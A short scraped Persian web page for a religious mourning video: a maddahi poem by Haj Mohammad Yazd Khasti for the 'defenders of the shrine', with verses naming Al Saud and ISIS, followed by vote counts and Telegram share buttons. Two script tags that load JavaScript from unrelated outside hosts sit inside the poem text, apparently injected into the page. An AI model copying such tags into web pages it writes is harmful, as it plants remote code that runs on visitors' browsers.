شیعه عمریست


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مداححی زیبای حاج محمد یزد خواستی برای مدافعان حرم
شیعه عمریست که هم سوخته هم ساخته است....
خوب بر صورت ما چنگ بزن آل سعود/بعد داعش به خدا کار تو هم ساخته است<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
11

- 
1

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر